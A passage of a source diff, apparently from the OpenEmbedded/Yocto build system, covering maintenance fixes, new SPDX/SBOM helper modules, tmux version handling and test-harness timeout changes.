--- a/meta/lib/oe/gpg_sign.py
+++ b/meta/lib/oe/gpg_sign.py
@@ -111,7 +111,7 @@ class LocalSigner(object):
111 111
112 def verify(self, sig_file): 112 def verify(self, sig_file):
113 """Verify signature""" 113 """Verify signature"""
114 cmd = self.gpg_cmd + [" --verify", "--no-permission-warning"] 114 cmd = self.gpg_cmd + ["--verify", "--no-permission-warning"]
115 if self.gpg_path: 115 if self.gpg_path:
116 cmd += ["--homedir", self.gpg_path] 116 cmd += ["--homedir", self.gpg_path]
117 117
diff --git a/meta/lib/oe/license.py b/meta/lib/oe/license.py
index c1274a61de..c4efbe142b 100644
--- a/meta/lib/oe/license.py
+++ b/meta/lib/oe/license.py
@@ -81,6 +81,9 @@ class FlattenVisitor(LicenseVisitor):
81 def visit_Str(self, node): 81 def visit_Str(self, node):
82 self.licenses.append(node.s) 82 self.licenses.append(node.s)
83 83
84 def visit_Constant(self, node):
85 self.licenses.append(node.value)
86
84 def visit_BinOp(self, node): 87 def visit_BinOp(self, node):
85 if isinstance(node.op, ast.BitOr): 88 if isinstance(node.op, ast.BitOr):
86 left = FlattenVisitor(self.choose_licenses) 89 left = FlattenVisitor(self.choose_licenses)
@@ -234,6 +237,9 @@ class ListVisitor(LicenseVisitor):
234 def visit_Str(self, node): 237 def visit_Str(self, node):
235 self.licenses.add(node.s) 238 self.licenses.add(node.s)
236 239
240 def visit_Constant(self, node):
241 self.licenses.add(node.value)
242
237def list_licenses(licensestr): 243def list_licenses(licensestr):
238 """Simply get a list of all licenses mentioned in a license string. 244 """Simply get a list of all licenses mentioned in a license string.
239 Binary operators are not applied or taken into account in any way""" 245 Binary operators are not applied or taken into account in any way"""
diff --git a/meta/lib/oe/package_manager.py b/meta/lib/oe/package_manager.py
index b0660411ea..502dfbe3ed 100644
--- a/meta/lib/oe/package_manager.py
+++ b/meta/lib/oe/package_manager.py
@@ -403,7 +403,7 @@ class PackageManager(object, metaclass=ABCMeta):
403 bb.utils.remove(self.intercepts_dir, True) 403 bb.utils.remove(self.intercepts_dir, True)
404 bb.utils.mkdirhier(self.intercepts_dir) 404 bb.utils.mkdirhier(self.intercepts_dir)
405 for intercept in postinst_intercepts: 405 for intercept in postinst_intercepts:
406 bb.utils.copyfile(intercept, os.path.join(self.intercepts_dir, os.path.basename(intercept))) 406 shutil.copy(intercept, os.path.join(self.intercepts_dir, os.path.basename(intercept)))
407 407
408 @abstractmethod 408 @abstractmethod
409 def _handle_intercept_failure(self, failed_script): 409 def _handle_intercept_failure(self, failed_script):
@@ -611,12 +611,13 @@ class PackageManager(object, metaclass=ABCMeta):
611 "'%s' returned %d:\n%s" % 611 "'%s' returned %d:\n%s" %
612 (' '.join(cmd), e.returncode, e.output.decode("utf-8"))) 612 (' '.join(cmd), e.returncode, e.output.decode("utf-8")))
613 613
614 target_arch = self.d.getVar('TARGET_ARCH') 614 if self.d.getVar('IMAGE_LOCALES_ARCHIVE') == '1':
615 localedir = oe.path.join(self.target_rootfs, self.d.getVar("libdir"), "locale") 615 target_arch = self.d.getVar('TARGET_ARCH')
616 if os.path.exists(localedir) and os.listdir(localedir): 616 localedir = oe.path.join(self.target_rootfs, self.d.getVar("libdir"), "locale")
617 generate_locale_archive(self.d, self.target_rootfs, target_arch, localedir) 617 if os.path.exists(localedir) and os.listdir(localedir):
618 # And now delete the binary locales 618 generate_locale_archive(self.d, self.target_rootfs, target_arch, localedir)
619 self.remove(fnmatch.filter(self.list_installed(), "glibc-binary-localedata-*"), False) 619 # And now delete the binary locales
620 self.remove(fnmatch.filter(self.list_installed(), "glibc-binary-localedata-*"), False)
620 621
621 def deploy_dir_lock(self): 622 def deploy_dir_lock(self):
622 if self.deploy_dir is None: 623 if self.deploy_dir is None:
diff --git a/meta/lib/oe/packagedata.py b/meta/lib/oe/packagedata.py
index a82085a792..feb834c0e3 100644
--- a/meta/lib/oe/packagedata.py
+++ b/meta/lib/oe/packagedata.py
@@ -57,6 +57,17 @@ def read_subpkgdata_dict(pkg, d):
57 ret[newvar] = subd[var] 57 ret[newvar] = subd[var]
58 return ret 58 return ret
59 59
60def read_subpkgdata_extended(pkg, d):
61 import json
62 import gzip
63
64 fn = d.expand("${PKGDATA_DIR}/extended/%s.json.gz" % pkg)
65 try:
66 with gzip.open(fn, "rt", encoding="utf-8") as f:
67 return json.load(f)
68 except FileNotFoundError:
69 return None
70
60def _pkgmap(d): 71def _pkgmap(d):
61 """Return a dictionary mapping package to recipe name.""" 72 """Return a dictionary mapping package to recipe name."""
62 73
diff --git a/meta/lib/oe/patch.py b/meta/lib/oe/patch.py
index 7cd8436da5..feb6ee7082 100644
--- a/meta/lib/oe/patch.py
+++ b/meta/lib/oe/patch.py
@@ -2,6 +2,9 @@
2# SPDX-License-Identifier: GPL-2.0-only 2# SPDX-License-Identifier: GPL-2.0-only
3# 3#
4 4
5import os
6import shlex
7import subprocess
5import oe.path 8import oe.path
6import oe.types 9import oe.types
7 10
@@ -24,7 +27,6 @@ class CmdError(bb.BBHandledException):
24 27
25 28
26def runcmd(args, dir = None): 29def runcmd(args, dir = None):
27 import pipes
28 import subprocess 30 import subprocess
29 31
30 if dir: 32 if dir:
@@ -35,7 +37,7 @@ def runcmd(args, dir = None):
35 # print("cwd: %s -> %s" % (olddir, dir)) 37 # print("cwd: %s -> %s" % (olddir, dir))
36 38
37 try: 39 try:
38 args = [ pipes.quote(str(arg)) for arg in args ] 40 args = [ shlex.quote(str(arg)) for arg in args ]
39 cmd = " ".join(args) 41 cmd = " ".join(args)
40 # print("cmd: %s" % cmd) 42 # print("cmd: %s" % cmd)
41 (exitstatus, output) = subprocess.getstatusoutput(cmd) 43 (exitstatus, output) = subprocess.getstatusoutput(cmd)
diff --git a/meta/lib/oe/reproducible.py b/meta/lib/oe/reproducible.py
index 0fb02ccdb0..1ed79b18ca 100644
--- a/meta/lib/oe/reproducible.py
+++ b/meta/lib/oe/reproducible.py
@@ -41,7 +41,7 @@ def find_git_folder(d, sourcedir):
41 for root, dirs, files in os.walk(workdir, topdown=True): 41 for root, dirs, files in os.walk(workdir, topdown=True):
42 dirs[:] = [d for d in dirs if d not in exclude] 42 dirs[:] = [d for d in dirs if d not in exclude]
43 if '.git' in dirs: 43 if '.git' in dirs:
44 return root 44 return os.path.join(root, ".git")
45 45
46 bb.warn("Failed to find a git repository in WORKDIR: %s" % workdir) 46 bb.warn("Failed to find a git repository in WORKDIR: %s" % workdir)
47 return None 47 return None
@@ -62,7 +62,8 @@ def get_source_date_epoch_from_git(d, sourcedir):
62 return None 62 return None
63 63
64 bb.debug(1, "git repository: %s" % gitpath) 64 bb.debug(1, "git repository: %s" % gitpath)
65 p = subprocess.run(['git', '--git-dir', gitpath, 'log', '-1', '--pretty=%ct'], check=True, stdout=subprocess.PIPE) 65 p = subprocess.run(['git', '-c', 'log.showSignature=false', '--git-dir', gitpath, 'log', '-1', '--pretty=%ct'],
66 check=True, stdout=subprocess.PIPE)
66 return int(p.stdout.decode('utf-8')) 67 return int(p.stdout.decode('utf-8'))
67 68
68def get_source_date_epoch_from_youngest_file(d, sourcedir): 69def get_source_date_epoch_from_youngest_file(d, sourcedir):
@@ -90,8 +91,12 @@ def get_source_date_epoch_from_youngest_file(d, sourcedir):
90 bb.debug(1, "Newest file found: %s" % newest_file) 91 bb.debug(1, "Newest file found: %s" % newest_file)
91 return source_date_epoch 92 return source_date_epoch
92 93
93def fixed_source_date_epoch(): 94def fixed_source_date_epoch(d):
94 bb.debug(1, "No tarball or git repo found to determine SOURCE_DATE_EPOCH") 95 bb.debug(1, "No tarball or git repo found to determine SOURCE_DATE_EPOCH")
96 source_date_epoch = d.getVar('SOURCE_DATE_EPOCH_FALLBACK')
97 if source_date_epoch:
98 bb.debug(1, "Using SOURCE_DATE_EPOCH_FALLBACK")
99 return int(source_date_epoch)
95 return 0 100 return 0
96 101
97def get_source_date_epoch(d, sourcedir): 102def get_source_date_epoch(d, sourcedir):
@@ -99,6 +104,6 @@ def get_source_date_epoch(d, sourcedir):
99 get_source_date_epoch_from_git(d, sourcedir) or 104 get_source_date_epoch_from_git(d, sourcedir) or
100 get_source_date_epoch_from_known_files(d, sourcedir) or 105 get_source_date_epoch_from_known_files(d, sourcedir) or
101 get_source_date_epoch_from_youngest_file(d, sourcedir) or 106 get_source_date_epoch_from_youngest_file(d, sourcedir) or
102 fixed_source_date_epoch() # Last resort 107 fixed_source_date_epoch(d) # Last resort
103 ) 108 )
104 109
diff --git a/meta/lib/oe/rootfs.py b/meta/lib/oe/rootfs.py
index cd65e62030..5391c25af9 100644
--- a/meta/lib/oe/rootfs.py
+++ b/meta/lib/oe/rootfs.py
@@ -167,7 +167,7 @@ class Rootfs(object, metaclass=ABCMeta):
167 pass 167 pass
168 os.rename(self.image_rootfs, self.image_rootfs + '-dbg') 168 os.rename(self.image_rootfs, self.image_rootfs + '-dbg')
169 169
170 bb.note(" Restoreing original rootfs...") 170 bb.note(" Restoring original rootfs...")
171 os.rename(self.image_rootfs + '-orig', self.image_rootfs) 171 os.rename(self.image_rootfs + '-orig', self.image_rootfs)
172 172
173 def _exec_shell_cmd(self, cmd): 173 def _exec_shell_cmd(self, cmd):
@@ -304,7 +304,7 @@ class Rootfs(object, metaclass=ABCMeta):
304 def _check_for_kernel_modules(self, modules_dir): 304 def _check_for_kernel_modules(self, modules_dir):
305 for root, dirs, files in os.walk(modules_dir, topdown=True): 305 for root, dirs, files in os.walk(modules_dir, topdown=True):
306 for name in files: 306 for name in files:
307 found_ko = name.endswith(".ko") 307 found_ko = name.endswith((".ko", ".ko.gz", ".ko.xz"))
308 if found_ko: 308 if found_ko:
309 return found_ko 309 return found_ko
310 return False 310 return False
@@ -321,7 +321,9 @@ class Rootfs(object, metaclass=ABCMeta):
321 if not os.path.exists(kernel_abi_ver_file): 321 if not os.path.exists(kernel_abi_ver_file):
322 bb.fatal("No kernel-abiversion file found (%s), cannot run depmod, aborting" % kernel_abi_ver_file) 322 bb.fatal("No kernel-abiversion file found (%s), cannot run depmod, aborting" % kernel_abi_ver_file)
323 323
324 kernel_ver = open(kernel_abi_ver_file).read().strip(' \n') 324 with open(kernel_abi_ver_file) as f:
325 kernel_ver = f.read().strip(' \n')
326
325 versioned_modules_dir = os.path.join(self.image_rootfs, modules_dir, kernel_ver) 327 versioned_modules_dir = os.path.join(self.image_rootfs, modules_dir, kernel_ver)
326 328
327 bb.utils.mkdirhier(versioned_modules_dir) 329 bb.utils.mkdirhier(versioned_modules_dir)
diff --git a/meta/lib/oe/sbom.py b/meta/lib/oe/sbom.py
new file mode 100644
index 0000000000..22ed5070ea
--- /dev/null
+++ b/meta/lib/oe/sbom.py
@@ -0,0 +1,84 @@
1#
2# Copyright OpenEmbedded Contributors
3#
4# SPDX-License-Identifier: GPL-2.0-only
5#
6
7import collections
8
9DepRecipe = collections.namedtuple("DepRecipe", ("doc", "doc_sha1", "recipe"))
10DepSource = collections.namedtuple("DepSource", ("doc", "doc_sha1", "recipe", "file"))
11
12
13def get_recipe_spdxid(d):
14 return "SPDXRef-%s-%s" % ("Recipe", d.getVar("PN"))
15
16
17def get_download_spdxid(d, idx):
18 return "SPDXRef-Download-%s-%d" % (d.getVar("PN"), idx)
19
20
21def get_package_spdxid(pkg):
22 return "SPDXRef-Package-%s" % pkg
23
24
25def get_source_file_spdxid(d, idx):
26 return "SPDXRef-SourceFile-%s-%d" % (d.getVar("PN"), idx)
27
28
29def get_packaged_file_spdxid(pkg, idx):
30 return "SPDXRef-PackagedFile-%s-%d" % (pkg, idx)
31
32
33def get_image_spdxid(img):
34 return "SPDXRef-Image-%s" % img
35
36
37def get_sdk_spdxid(sdk):
38 return "SPDXRef-SDK-%s" % sdk
39
40
41def write_doc(d, spdx_doc, subdir, spdx_deploy=None, indent=None):
42 from pathlib import Path
43
44 if spdx_deploy is None:
45 spdx_deploy = Path(d.getVar("SPDXDEPLOY"))
46
47 dest = spdx_deploy / subdir / (spdx_doc.name + ".spdx.json")
48 dest.parent.mkdir(exist_ok=True, parents=True)
49 with dest.open("wb") as f:
50 doc_sha1 = spdx_doc.to_json(f, sort_keys=True, indent=indent)
51
52 l = spdx_deploy / "by-namespace" / spdx_doc.documentNamespace.replace("/", "_")
53 l.parent.mkdir(exist_ok=True, parents=True)
54 l.symlink_to(os.path.relpath(dest, l.parent))
55
56 return doc_sha1
57
58
59def read_doc(fn):
60 import hashlib
61 import oe.spdx
62 import io
63 import contextlib
64
65 @contextlib.contextmanager
66 def get_file():
67 if isinstance(fn, io.IOBase):
68 yield fn
69 else:
70 with fn.open("rb") as f:
71 yield f
72
73 with get_file() as f:
74 sha1 = hashlib.sha1()
75 while True:
76 chunk = f.read(4096)
77 if not chunk:
78 break
79 sha1.update(chunk)
80
81 f.seek(0)
82 doc = oe.spdx.SPDXDocument.from_json(f)
83
84 return (doc, sha1.hexdigest())
diff --git a/meta/lib/oe/spdx.py b/meta/lib/oe/spdx.py
new file mode 100644
index 0000000000..7aaf2af5ed
--- /dev/null
+++ b/meta/lib/oe/spdx.py
@@ -0,0 +1,357 @@
1#
2# Copyright OpenEmbedded Contributors
3#
4# SPDX-License-Identifier: GPL-2.0-only
5#
6
7#
8# This library is intended to capture the JSON SPDX specification in a type
9# safe manner. It is not intended to encode any particular OE specific
10# behaviors, see the sbom.py for that.
11#
12# The documented SPDX spec document doesn't cover the JSON syntax for
13# particular configuration, which can make it hard to determine what the JSON
14# syntax should be. I've found it is actually much simpler to read the official
15# SPDX JSON schema which can be found here: https://github.com/spdx/spdx-spec
16# in schemas/spdx-schema.json
17#
18
19import hashlib
20import itertools
21import json
22
23SPDX_VERSION = "2.2"
24
25
26#
27# The following are the support classes that are used to implement SPDX object
28#
29
30class _Property(object):
31 """
32 A generic SPDX object property. The different types will derive from this
33 class
34 """
35
36 def __init__(self, *, default=None):
37 self.default = default
38
39 def setdefault(self, dest, name):
40 if self.default is not None:
41 dest.setdefault(name, self.default)
42
43
44class _String(_Property):
45 """
46 A scalar string property for an SPDX object
47 """
48
49 def __init__(self, **kwargs):
50 super().__init__(**kwargs)
51
52 def set_property(self, attrs, name):
53 def get_helper(obj):
54 return obj._spdx[name]
55
56 def set_helper(obj, value):
57 obj._spdx[name] = value
58
59 def del_helper(obj):
60 del obj._spdx[name]
61
62 attrs[name] = property(get_helper, set_helper, del_helper)
63
64 def init(self, source):
65 return source
66
67
68class _Object(_Property):
69 """
70 A scalar SPDX object property of a SPDX object
71 """
72
73 def __init__(self, cls, **kwargs):
74 super().__init__(**kwargs)
75 self.cls = cls
76
77 def set_property(self, attrs, name):
78 def get_helper(obj):
79 if not name in obj._spdx:
80 obj._spdx[name] = self.cls()
81 return obj._spdx[name]
82
83 def set_helper(obj, value):
84 obj._spdx[name] = value
85
86 def del_helper(obj):
87 del obj._spdx[name]
88
89 attrs[name] = property(get_helper, set_helper)
90
91 def init(self, source):
92 return self.cls(**source)
93
94
95class _ListProperty(_Property):
96 """
97 A list of SPDX properties
98 """
99
100 def __init__(self, prop, **kwargs):
101 super().__init__(**kwargs)
102 self.prop = prop
103
104 def set_property(self, attrs, name):
105 def get_helper(obj):
106 if not name in obj._spdx:
107 obj._spdx[name] = []
108 return obj._spdx[name]
109
110 def set_helper(obj, value):
111 obj._spdx[name] = list(value)
112
113 def del_helper(obj):
114 del obj._spdx[name]
115
116 attrs[name] = property(get_helper, set_helper, del_helper)
117
118 def init(self, source):
119 return [self.prop.init(o) for o in source]
120
121
122class _StringList(_ListProperty):
123 """
124 A list of strings as a property for an SPDX object
125 """
126
127 def __init__(self, **kwargs):
128 super().__init__(_String(), **kwargs)
129
130
131class _ObjectList(_ListProperty):
132 """
133 A list of SPDX objects as a property for an SPDX object
134 """
135
136 def __init__(self, cls, **kwargs):
137 super().__init__(_Object(cls), **kwargs)
138
139
140class MetaSPDXObject(type):
141 """
142 A metaclass that allows properties (anything derived from a _Property
143 class) to be defined for a SPDX object
144 """
145 def __new__(mcls, name, bases, attrs):
146 attrs["_properties"] = {}
147
148 for key in attrs.keys():
149 if isinstance(attrs[key], _Property):
150 prop = attrs[key]
151 attrs["_properties"][key] = prop
152 prop.set_property(attrs, key)
153
154 return super().__new__(mcls, name, bases, attrs)
155
156
157class SPDXObject(metaclass=MetaSPDXObject):
158 """
159 The base SPDX object; all SPDX spec classes must derive from this class
160 """
161 def __init__(self, **d):
162 self._spdx = {}
163
164 for name, prop in self._properties.items():
165 prop.setdefault(self._spdx, name)
166 if name in d:
167 self._spdx[name] = prop.init(d[name])
168
169 def serializer(self):
170 return self._spdx
171
172 def __setattr__(self, name, value):
173 if name in self._properties or name == "_spdx":
174 super().__setattr__(name, value)
175 return
176 raise KeyError("%r is not a valid SPDX property" % name)
177
178#
179# These are the SPDX objects implemented from the spec. The *only* properties
180# that can be added to these objects are ones directly specified in the SPDX
181# spec, however you may add helper functions to make operations easier.
182#
183# Defaults should *only* be specified if the SPDX spec says there is a certain
184# required value for a field (e.g. dataLicense), or if the field is mandatory
185# and has some sane "this field is unknown" (e.g. "NOASSERTION")
186#
187
188class SPDXAnnotation(SPDXObject):
189 annotationDate = _String()
190 annotationType = _String()
191 annotator = _String()
192 comment = _String()
193
194class SPDXChecksum(SPDXObject):
195 algorithm = _String()
196 checksumValue = _String()
197
198
199class SPDXRelationship(SPDXObject):
200 spdxElementId = _String()
201 relatedSpdxElement = _String()
202 relationshipType = _String()
203 comment = _String()
204 annotations = _ObjectList(SPDXAnnotation)
205
206
207class SPDXExternalReference(SPDXObject):
208 referenceCategory = _String()
209 referenceType = _String()
210 referenceLocator = _String()
211
212
213class SPDXPackageVerificationCode(SPDXObject):
214 packageVerificationCodeValue = _String()
215 packageVerificationCodeExcludedFiles = _StringList()
216
217
218class SPDXPackage(SPDXObject):
219 ALLOWED_CHECKSUMS = [
220 "SHA1",
221 "SHA224",
222 "SHA256",
223 "SHA384",
224 "SHA512",
225 "MD2",
226 "MD4",
227 "MD5",
228 "MD6",
229 ]
230
231 name = _String()
232 SPDXID = _String()
233 versionInfo = _String()
234 downloadLocation = _String(default="NOASSERTION")
235 supplier = _String(default="NOASSERTION")
236 homepage = _String()
237 licenseConcluded = _String(default="NOASSERTION")
238 licenseDeclared = _String(default="NOASSERTION")
239 summary = _String()
240 description = _String()
241 sourceInfo = _String()
242 copyrightText = _String(default="NOASSERTION")
243 licenseInfoFromFiles = _StringList(default=["NOASSERTION"])
244 externalRefs = _ObjectList(SPDXExternalReference)
245 packageVerificationCode = _Object(SPDXPackageVerificationCode)
246 hasFiles = _StringList()
247 packageFileName = _String()
248 annotations = _ObjectList(SPDXAnnotation)
249 checksums = _ObjectList(SPDXChecksum)
250
251
252class SPDXFile(SPDXObject):
253 SPDXID = _String()
254 fileName = _String()
255 licenseConcluded = _String(default="NOASSERTION")
256 copyrightText = _String(default="NOASSERTION")
257 licenseInfoInFiles = _StringList(default=["NOASSERTION"])
258 checksums = _ObjectList(SPDXChecksum)
259 fileTypes = _StringList()
260
261
262class SPDXCreationInfo(SPDXObject):
263 created = _String()
264 licenseListVersion = _String()
265 comment = _String()
266 creators = _StringList()
267
268
269class SPDXExternalDocumentRef(SPDXObject):
270 externalDocumentId = _String()
271 spdxDocument = _String()
272 checksum = _Object(SPDXChecksum)
273
274
275class SPDXExtractedLicensingInfo(SPDXObject):
276 name = _String()
277 comment = _String()
278 licenseId = _String()
279 extractedText = _String()
280
281
282class SPDXDocument(SPDXObject):
283 spdxVersion = _String(default="SPDX-" + SPDX_VERSION)
284 dataLicense = _String(default="CC0-1.0")
285 SPDXID = _String(default="SPDXRef-DOCUMENT")
286 name = _String()
287 documentNamespace = _String()
288 creationInfo = _Object(SPDXCreationInfo)
289 packages = _ObjectList(SPDXPackage)
290 files = _ObjectList(SPDXFile)
291 relationships = _ObjectList(SPDXRelationship)
292 externalDocumentRefs = _ObjectList(SPDXExternalDocumentRef)
293 hasExtractedLicensingInfos = _ObjectList(SPDXExtractedLicensingInfo)
294
295 def __init__(self, **d):
296 super().__init__(**d)
297
298 def to_json(self, f, *, sort_keys=False, indent=None, separators=None):
299 class Encoder(json.JSONEncoder):
300 def default(self, o):
301 if isinstance(o, SPDXObject):
302 return o.serializer()
303
304 return super().default(o)
305
306 sha1 = hashlib.sha1()
307 for chunk in Encoder(
308 sort_keys=sort_keys,
309 indent=indent,
310 separators=separators,
311 ).iterencode(self):
312 chunk = chunk.encode("utf-8")
313 f.write(chunk)
314 sha1.update(chunk)
315
316 return sha1.hexdigest()
317
318 @classmethod
319 def from_json(cls, f):
320 return cls(**json.load(f))
321
322 def add_relationship(self, _from, relationship, _to, *, comment=None, annotation=None):
323 if isinstance(_from, SPDXObject):
324 from_spdxid = _from.SPDXID
325 else:
326 from_spdxid = _from
327
328 if isinstance(_to, SPDXObject):
329 to_spdxid = _to.SPDXID
330 else:
331 to_spdxid = _to
332
333 r = SPDXRelationship(
334 spdxElementId=from_spdxid,
335 relatedSpdxElement=to_spdxid,
336 relationshipType=relationship,
337 )
338
339 if comment is not None:
340 r.comment = comment
341
342 if annotation is not None:
343 r.annotations.append(annotation)
344
345 self.relationships.append(r)
346
347 def find_by_spdxid(self, spdxid):
348 for o in itertools.chain(self.packages, self.files):
349 if o.SPDXID == spdxid:
350 return o
351 return None
352
353 def find_external_document_ref(self, namespace):
354 for r in self.externalDocumentRefs:
355 if r.spdxDocument == namespace:
356 return r
357 return None
diff --git a/meta/lib/oe/sstatesig.py b/meta/lib/oe/sstatesig.py
index aeceb100d7..65bb4efe25 100644
--- a/meta/lib/oe/sstatesig.py
+++ b/meta/lib/oe/sstatesig.py
@@ -480,8 +480,10 @@ def OEOuthashBasic(path, sigfile, task, d):
480 if "package_write_" in task or task == "package_qa": 480 if "package_write_" in task or task == "package_qa":
481 include_owners = False 481 include_owners = False
482 include_timestamps = False 482 include_timestamps = False
483 include_root = True
483 if task == "package": 484 if task == "package":
484 include_timestamps = d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1' 485 include_timestamps = d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1'
486 include_root = False
485 extra_content = d.getVar('HASHEQUIV_HASH_VERSION') 487 extra_content = d.getVar('HASHEQUIV_HASH_VERSION')
486 488
487 try: 489 try:
@@ -592,7 +594,8 @@ def OEOuthashBasic(path, sigfile, task, d):
592 update_hash("\n") 594 update_hash("\n")
593 595
594 # Process this directory and all its child files 596 # Process this directory and all its child files
595 process(root) 597 if include_root or root != ".":
598 process(root)
596 for f in files: 599 for f in files:
597 if f == 'fixmepath': 600 if f == 'fixmepath':
598 continue 601 continue
diff --git a/meta/lib/oe/terminal.py b/meta/lib/oe/terminal.py
index eb10a6e33e..a0c166d884 100644
--- a/meta/lib/oe/terminal.py
+++ b/meta/lib/oe/terminal.py
@@ -102,6 +102,10 @@ class Rxvt(XTerminal):
102 command = 'rxvt -T "{title}" -e {command}' 102 command = 'rxvt -T "{title}" -e {command}'
103 priority = 1 103 priority = 1
104 104
105class URxvt(XTerminal):
106 command = 'urxvt -T "{title}" -e {command}'
107 priority = 1
108
105class Screen(Terminal): 109class Screen(Terminal):
106 command = 'screen -D -m -t "{title}" -S devshell {command}' 110 command = 'screen -D -m -t "{title}" -S devshell {command}'
107 111
@@ -163,7 +167,12 @@ class Tmux(Terminal):
163 # devshells, if it's already there, add a new window to it. 167 # devshells, if it's already there, add a new window to it.
164 window_name = 'devshell-%i' % os.getpid() 168 window_name = 'devshell-%i' % os.getpid()
165 169
166 self.command = 'tmux new -c "{{cwd}}" -d -s {0} -n {0} "{{command}}"'.format(window_name) 170 self.command = 'tmux new -c "{{cwd}}" -d -s {0} -n {0} "{{command}}"'
171 if not check_tmux_version('1.9'):
172 # `tmux new-session -c` was added in 1.9;
173 # older versions fail with that flag
174 self.command = 'tmux new -d -s {0} -n {0} "{{command}}"'
175 self.command = self.command.format(window_name)
167 Terminal.__init__(self, sh_cmd, title, env, d) 176 Terminal.__init__(self, sh_cmd, title, env, d)
168 177
169 attach_cmd = 'tmux att -t {0}'.format(window_name) 178 attach_cmd = 'tmux att -t {0}'.format(window_name)
@@ -253,13 +262,18 @@ def spawn(name, sh_cmd, title=None, env=None, d=None):
253 except OSError: 262 except OSError:
254 return 263 return
255 264
265def check_tmux_version(desired):
266 vernum = check_terminal_version("tmux")
267 if vernum and LooseVersion(vernum) < desired:
268 return False
269 return vernum
270
256def check_tmux_pane_size(tmux): 271def check_tmux_pane_size(tmux):
257 import subprocess as sub 272 import subprocess as sub
258 # On older tmux versions (<1.9), return false. The reason 273 # On older tmux versions (<1.9), return false. The reason
259 # is that there is no easy way to get the height of the active panel 274 # is that there is no easy way to get the height of the active panel
260 # on current window without nested formats (available from version 1.9) 275 # on current window without nested formats (available from version 1.9)
261 vernum = check_terminal_version("tmux") 276 if not check_tmux_version('1.9'):
262 if vernum and LooseVersion(vernum) < '1.9':
263 return False 277 return False
264 try: 278 try:
265 p = sub.Popen('%s list-panes -F "#{?pane_active,#{pane_height},}"' % tmux, 279 p = sub.Popen('%s list-panes -F "#{?pane_active,#{pane_height},}"' % tmux,
diff --git a/meta/lib/oe/utils.py b/meta/lib/oe/utils.py
index 83d298906b..3e016244c5 100644
--- a/meta/lib/oe/utils.py
+++ b/meta/lib/oe/utils.py
@@ -481,7 +481,8 @@ class ThreadedWorker(Thread):
481 try: 481 try:
482 func(self, *args, **kargs) 482 func(self, *args, **kargs)
483 except Exception as e: 483 except Exception as e:
484 print(e) 484 # Eat all exceptions
485 bb.mainlogger.debug("Worker task raised %s" % e, exc_info=e)
485 finally: 486 finally:
486 self.tasks.task_done() 487 self.tasks.task_done()
487 488
diff --git a/meta/lib/oeqa/core/case.py b/meta/lib/oeqa/core/case.py
index aae451fef2..bc4446a938 100644
--- a/meta/lib/oeqa/core/case.py
+++ b/meta/lib/oeqa/core/case.py
@@ -43,8 +43,13 @@ class OETestCase(unittest.TestCase):
43 clss.tearDownClassMethod() 43 clss.tearDownClassMethod()
44 44
45 def _oeSetUp(self): 45 def _oeSetUp(self):
46 for d in self.decorators: 46 try:
47 d.setUpDecorator() 47 for d in self.decorators:
48 d.setUpDecorator()
49 except:
50 for d in self.decorators:
51 d.tearDownDecorator()
52 raise
48 self.setUpMethod() 53 self.setUpMethod()
49 54
50 def _oeTearDown(self): 55 def _oeTearDown(self):
diff --git a/meta/lib/oeqa/core/decorator/oetimeout.py b/meta/lib/oeqa/core/decorator/oetimeout.py
index df90d1c798..5e6873ad48 100644
--- a/meta/lib/oeqa/core/decorator/oetimeout.py
+++ b/meta/lib/oeqa/core/decorator/oetimeout.py
@@ -24,5 +24,6 @@ class OETimeout(OETestDecorator):
24 24
25 def tearDownDecorator(self): 25 def tearDownDecorator(self):
26 signal.alarm(0) 26 signal.alarm(0)
27 signal.signal(signal.SIGALRM, self.alarmSignal) 27 if hasattr(self, 'alarmSignal'):
28 self.logger.debug("Removed SIGALRM handler") 28 signal.signal(signal.SIGALRM, self.alarmSignal)
29 self.logger.debug("Removed SIGALRM handler")
diff --git a/meta/lib/oeqa/core/target/ssh.py b/meta/lib/oeqa/core/target/ssh.py
index aefb576805..832b6216f6 100644
--- a/meta/lib/oeqa/core/target/ssh.py
+++ b/meta/lib/oeqa/core/target/ssh.py
@@ -34,6 +34,7 @@ class OESSHTarget(OETarget):
34 self.timeout = timeout 34 self.timeout = timeout
35 self.user = user 35 self.user = user
36 ssh_options = [ 36 ssh_options = [
37 '-o', 'HostKeyAlgorithms=+ssh-rsa',
37 '-o', 'UserKnownHostsFile=/dev/null', 38 '-o', 'UserKnownHostsFile=/dev/null',
38 '-o', 'StrictHostKeyChecking=no', 39 '-o', 'StrictHostKeyChecking=no',
39 '-o', 'LogLevel=ERROR' 40 '-o', 'LogLevel=ERROR'
@@ -225,6 +226,9 @@ def SSHCall(command, logger, timeout=None, **opts):
225 endtime = time.time() + timeout 226 endtime = time.time() + timeout
226 except InterruptedError: 227 except InterruptedError:
227 continue 228 continue
229 except BlockingIOError:
230 logger.debug('BlockingIOError')
231 continue
228 232
229 # process hasn't returned yet 233 # process hasn't returned yet
230 if not eof: 234 if not eof:
diff --git a/meta/lib/oeqa/core/tests/cases/timeout.py b/meta/lib/oeqa/core/tests/cases/timeout.py
index 5dfecc7b7c..69cf969a67 100644
--- a/meta/lib/oeqa/core/tests/cases/timeout.py
+++ b/meta/lib/oeqa/core/tests/cases/timeout.py
@@ -8,6 +8,7 @@ from time import sleep
8 8
9from oeqa.core.case import OETestCase 9from oeqa.core.case import OETestCase
10from oeqa.core.decorator.oetimeout import OETimeout 10from oeqa.core.decorator.oetimeout import OETimeout
11from oeqa.core.decorator.depends import OETestDepends
11 12
12class TimeoutTest(OETestCase): 13class TimeoutTest(OETestCase):
13 14
@@ -19,3 +20,15 @@ class TimeoutTest(OETestCase):
19 def testTimeoutFail(self): 20 def testTimeoutFail(self):
20 sleep(2) 21 sleep(2)
21 self.assertTrue(True, msg='How is this possible?') 22 self.assertTrue(True, msg='How is this possible?')
23
24
25 def testTimeoutSkip(self):
26 self.skipTest("This test needs to be skipped, so that testTimeoutDepends()'s OETestDepends kicks in")
27
28 @OETestDepends(["timeout.TimeoutTest.testTimeoutSkip"])
29 @OETimeout(3)
30 def testTimeoutDepends(self):
31 self.assertTrue(False, msg='How is this possible?')
32
33 def testTimeoutUnrelated(self):
34 sleep(6)
diff --git a/meta/lib/oeqa/core/tests/test_decorators.py b/meta/lib/oeqa/core/tests/test_decorators.py
index b798bf7d33..5095f39948 100755
--- a/meta/lib/oeqa/core/tests/test_decorators.py
+++ b/meta/lib/oeqa/core/tests/test_decorators.py
@@ -133,5 +133,11 @@ class TestTimeoutDecorator(TestBase):
